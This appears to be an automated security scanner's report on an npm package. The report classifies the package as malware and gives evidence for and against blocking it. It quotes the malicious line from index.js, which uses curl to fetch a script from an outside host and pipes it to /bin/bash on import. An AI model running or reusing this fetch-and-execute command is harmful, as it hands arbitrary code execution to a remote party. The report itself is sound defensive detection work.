AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js imports node:child_process and calls exec at module load.
- index.js executes `curl fewafw.hydege.me | /bin/bash`.
- Remote response is piped directly to a shell, enabling arbitrary code execution on import.
Evidence against
- package.json has no lifecycle scripts.
- No credential harvesting or persistence is present in the inspected files.
Behavioral surface
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 531 B of source